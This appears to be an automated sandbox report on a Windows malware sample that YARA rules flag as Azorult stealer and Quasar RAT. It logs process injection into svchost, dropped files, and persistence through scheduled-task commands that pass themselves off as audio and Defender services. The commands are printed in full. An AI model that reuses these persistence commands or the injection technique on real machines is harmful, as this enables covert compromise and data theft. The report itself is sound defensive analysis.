Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_004119AC FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00412D6C FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0041160C FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00AA445A GetFileAttributesW,FindFirstFileW,FindClose,

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DB4B37 LoadLibraryA,GetProcAddress,

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_3_037F00BE mov esi, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_3_037F00BE mov esi, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00407AF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_3_014C00BE mov esi, dword ptr fs:[00000030h]
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_3_014C00BE mov esi, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DB3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DE5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DE97A2 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

Source: C:\Users\user\AppData\Local\Temp\windef.exe

Process token adjusted: Debug

Source: C:\Windows\System32\svchost.exe

Code function: 5_2_00C9A002 LdrLoadDll,

Source: C:\Users\user\AppData\Local\Temp\windef.exe

Memory allocated: page read and write | page guard

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DDA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DDA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A6A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\AppData\Local\Temp\vnc.exe

Section loaded: unknown target: C:\Windows\System32\svchost.exe protection: execute and read and write

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\AppData\Local\Temp\vnc.exe

Memory allocated: C:\Windows\System32\svchost.exe base: D00000 protect: page execute and read and write

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Memory written: C:\Users\user\Desktop\CVbJSUXraQ.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Memory written: C:\Users\user\btpanui\SystemPropertiesPerformance.exe base: 400000 value starts with: 4D5A

Contains functionality to inject code into remote processes

Show sources

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_3_037F00BE CreateProcessW,GetThreadContext,ReadProcessMemory,VirtualAlloc,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualProtectEx,VirtualFree,WriteProcessMemory,SetThreadContext,ResumeThread,

Writes to foreign memory regions

Show sources

Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF6EB844380
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Memory written: C:\Windows\System32\svchost.exe base: D00000
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF6EB844380

.NET source code references suspicious native API functions

Show sources

Source: winsock.exe.6.dr, u218f?uf56e???ufffd????u25e0??????u20e0uf421.cs	Reference to suspicious API methods: ('????????????????????', 'LoadLibrary@kernel32.dll'), ('????????????????????', 'GetProcAddress@kernel32.dll')
Source: winsock.exe.6.dr, ??uf019??u2720???uf88au171b???????u222f?.cs	Reference to suspicious API methods: ('????????????????????', 'MapVirtualKeyEx@user32.dll')
Source: 6.0.windef.exe.f10000.0.unpack, u218f?uf56e???ufffd????u25e0??????u20e0uf421.cs	Reference to suspicious API methods: ('????????????????????', 'LoadLibrary@kernel32.dll'), ('????????????????????', 'GetProcAddress@kernel32.dll')
Source: 6.0.windef.exe.f10000.0.unpack, ??uf019??u2720???uf88au171b???????u222f?.cs	Reference to suspicious API methods: ('????????????????????', 'MapVirtualKeyEx@user32.dll')
Source: 6.2.windef.exe.f10000.0.unpack, ??uf019??u2720???uf88au171b???????u222f?.cs	Reference to suspicious API methods: ('????????????????????', 'MapVirtualKeyEx@user32.dll')
Source: 6.2.windef.exe.f10000.0.unpack, u218f?uf56e???ufffd????u25e0??????u20e0uf421.cs	Reference to suspicious API methods: ('????????????????????', 'LoadLibrary@kernel32.dll'), ('????????????????????', 'GetProcAddress@kernel32.dll')

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Local\Temp\vnc.exe

Thread register set: target process: 5200

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DB48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Users\user\AppData\Local\Temp\vnc.exe 'C:\Users\user\AppData\Local\Temp\vnc.exe'
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Users\user\Desktop\CVbJSUXraQ.exe C:\Users\user\Desktop\CVbJSUXraQ.exe
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks' /create /tn 'win defender run' /sc ONLOGON /tr 'C:\Users\user\AppData\Local\Temp\windef.exe' /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process created: C:\Users\user\AppData\Roaming\SubDir\winsock.exe C:\Users\user\AppData\Roaming\SubDir\winsock.exe
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Users\user\AppData\Local\Temp\vnc.exe 'C:\Users\user\AppData\Local\Temp\vnc.exe'
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Users\user\btpanui\SystemPropertiesPerformance.exe C:\Users\user\btpanui\SystemPropertiesPerformance.exe
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DB3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00E0874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

Source: CVbJSUXraQ.exe, 00000001.00000000.668612321.0000000000E64000.00000002.00020000.sdmp, CVbJSUXraQ.exe, 00000007.00000002.939474482.0000000000E64000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000000.695369238.0000000000AF4000.00000002.00020000.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: CVbJSUXraQ.exe, 00000001.00000002.944287940.0000000002350000.00000002.00020000.sdmp, vnc.exe, svchost.exe, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: CVbJSUXraQ.exe, SystemPropertiesPerformance.exe	Binary or memory string: Shell_TrayWnd
Source: CVbJSUXraQ.exe, 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp, vnc.exe, svchost.exe, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	Binary or memory string: GetProgmanWindow
Source: CVbJSUXraQ.exe, 00000001.00000002.944287940.0000000002350000.00000002.00020000.sdmp, vnc.exe, svchost.exe, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	Binary or memory string: Progman
Source: CVbJSUXraQ.exe, 00000001.00000002.944287940.0000000002350000.00000002.00020000.sdmp, svchost.exe, 00000005.00000000.720749842.0000020DCC390000.00000002.00020000.sdmp, CVbJSUXraQ.exe, 00000007.00000002.942639016.0000000001DD0000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000002.942828030.00000000029A0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: CVbJSUXraQ.exe, 00000001.00000002.944000384.00000000016FA000.00000004.00000001.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000002.941562165.00000000017DC000.00000004.00000001.sdmp	Binary or memory string: [CLASS:Progman]
Source: SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	Binary or memory string: explorerframe.dllshell32.dllexplorer.exewindows.immersiveshell.serviceprovider.dlltwinui.dllwpncore.dllauthui.dllpnidui.dllhgcpl.dllBINotifiedNewSessionEventStartMenuCacheFileReorderShellReadyEventShellDesktopSwitchEventwindows.immersiveshell.serviceprovider.dllCreateDesktopExACreateDesktopExWOpenDesktopAOpenDesktopWOpenInputDesktopSwitchDesktopSetThreadDesktopGetUserObjectInformationAGetUserObjectInformationWFlashWindowExFlashWindowGetCaretBlinkTimeTrackPopupMenuExSetShellWindowSetShellWindowExGetShellWindowSetTaskmanWindowGetTaskmanWindowSetProgmanWindowGetProgmanWindowSystemParametersInfoWSystemParametersInfoAgdi32.dllSetDIBitsToDeviceBitBltWinmm.dllPlaySoundAPlaySoundWsndPlaySoundAsndPlaySoundWBeepMessageBeepwaveOutOpendsound.dllDirectSoundCreateDirectSoundCaptureCreateDirectSoundFullDuplexCreate8DirectSoundFullDuplexCreateDirectSoundCreate8DirectSoundCaptureCreate8LoadLibraryWLoadLibraryExALoadLibraryExWGetProcAddressRegQueryValueExWRegGetValueWntdll.dllZwRaiseHardErrorNtRaiseHardErrorZwConnectPortNtConnectPortShell32.dllSHRestrictedSHGetSetSettingsUxTheme.dllSetThemeAppPropertiesDefWindowProcWDefWindowProcADefDlgProcWDefDlgProcADefFrameProcWDefFrameProcADefMDIChildProcWDefMDIChildProcACallWindowProcWCallWindowProcAGetMessageWGetMessageAPeekMessageWPeekMessageATranslateMessageGetCursorPosd3d10_1.dllSetCursorPosd3d10_1core.dlld3d10.dlld3d10core.dlld2d1.dllGetMessagePosOPENGL32.dlld3d9.dlld3d11.dllDxtrans.dllSetCaptureFlash6.ocxReleaseCaptureGetCaptureCreateDesktopACreateDesktopWCreateDXGIFactory1D3D10CreateDevice1Direct3DCreate9Direct3DCreate9Ex\ThemeApiPortRtlSetUnhandledExceptionFilterMessageBoxTimeoutAuser32Program ManagerProgmanSHELLDLL_DefViewFolderViewSysListView32Shell_TrayWndNotifyIconOverflowWindow/0#32770MSTaskSwWClassTrayNotifyWndtaskmgrversion.dllGetFileVersionInfoSizeWGetFileVersionInfoW1.3.6.1.4.1.311.2.1.12rY
Source: SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	Binary or memory string: explorerframe.dllshell32.dllexplorer.exewindows.immersiveshell.serviceprovider.dlltwinui.dllwpncore.dllauthui.dllpnidui.dllhgcpl.dllBINotifiedNewSessionEventStartMenuCacheFileReorderShellReadyEventShellDesktopSwitchEventwindows.immersiveshell.serviceprovider.dllDefWindowProcWDefWindowProcADefDlgProcWDefDlgProcADefFrameProcWDefFrameProcADefMDIChildProcWDefMDIChildProcACallWindowProcWCallWindowProcAGetMessageWGetMessageAPeekMessageWPeekMessageATranslateMessageGetCursorPosd3d10_1.dllSetCursorPosd3d10_1core.dlld3d10.dlld3d10core.dlld2d1.dllGetMessagePosOPENGL32.dlld3d9.dlld3d11.dllDxtrans.dllSetCaptureFlash6.ocxReleaseCaptureGetCaptureCreateDesktopACreateDesktopWCreateDesktopExACreateDesktopExWOpenDesktopAOpenDesktopWOpenInputDesktopSwitchDesktopSetThreadDesktopGetUserObjectInformationAGetUserObjectInformationWFlashWindowExFlashWindowGetCaretBlinkTimeTrackPopupMenuExSetShellWindowSetShellWindowExGetShellWindowSetTaskmanWindowGetTaskmanWindowSetProgmanWindowGetProgmanWindowSystemParametersInfoWSystemParametersInfoAgdi32.dllSetDIBitsToDeviceBitBltWinmm.dllPlaySoundAPlaySoundWsndPlaySoundAsndPlaySoundWBeepMessageBeepwaveOutOpendsound.dllDirectSoundCreateDirectSoundCaptureCreateDirectSoundFullDuplexCreate8DirectSoundFullDuplexCreateDirectSoundCreate8DirectSoundCaptureCreate8LoadLibraryWLoadLibraryExALoadLibraryExWGetProcAddressRegQueryValueExWRegGetValueWntdll.dllZwRaiseHardErrorNtRaiseHardErrorZwConnectPortNtConnectPortShell32.dllSHRestrictedSHGetSetSettingsUxTheme.dllSetThemeAppPropertiesCreateDXGIFactory1D3D10CreateDevice1Direct3DCreate9Direct3DCreate9Ex\ThemeApiPortRtlSetUnhandledExceptionFilterMessageBoxTimeoutAuser32Program ManagerProgmanSHELLDLL_DefViewFolderViewSysListView32Shell_TrayWndNotifyIconOverflowWindow/0#32770MSTaskSwWClassTrayNotifyWndtaskmgr\version.dllGetFileVersionInfoSizeWGetFileVersionInfoW1.3.6.1.4.1.311.2.1.12rY
Source: CVbJSUXraQ.exe, 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp, vnc.exe, svchost.exe, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	Binary or memory string: SetProgmanWindow

Source: C:\Windows\System32\svchost.exe	Code function: GetWindowRect,GetWindowRect,GetWindowRect,RedrawWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetLocaleInfoW,CharUpperBuffW,memcpy,RedrawWindow,
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: GetLocaleInfoA,

Source: C:\Users\user\AppData\Local\Temp\windef.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\windef.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\vnc.exe

Code function: 4_2_00ACEA96 cpuid

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DD520A GetSystemTimeAsFileTime,__aulldiv,

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 7_2_004065F0 GetUserNameW,

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DB49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

Stealing of Sensitive Information:

Yara detected Azorult Info Stealer

Show sources

Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.3800000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.3800000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.755481459.0000000001886000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.755557311.00000000018A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671626163.0000000001804000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.755386297.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.790922233.00000000014D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.791563765.0000000001886000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.795274268.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671306839.00000000017E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671456955.00000000017CB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.790988055.000000000192E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671650973.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.941562165.00000000017DC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.794854333.0000000000401000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.689677970.000000000176B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.941883221.0000000001557000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671172624.00000000017CB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671475144.00000000017CB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.791810701.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671495263.0000000001804000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.686858693.000000000183D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.689148939.0000000003800000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671160297.0000000001794000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.690115376.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR

Yara detected Quasar RAT

Show sources

Source: Yara match	File source: CVbJSUXraQ.exe, type: SAMPLE
Source: Yara match	File source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.745828436.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000000.783293959.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.724863626.00000000003F2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.754022001.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.706677041.0000000000882000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.732311496.00000000003F2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.938115894.0000000000882000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.737013238.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.797076892.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.698706571.0000000001637000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.708127388.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: windef.exe PID: 5848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
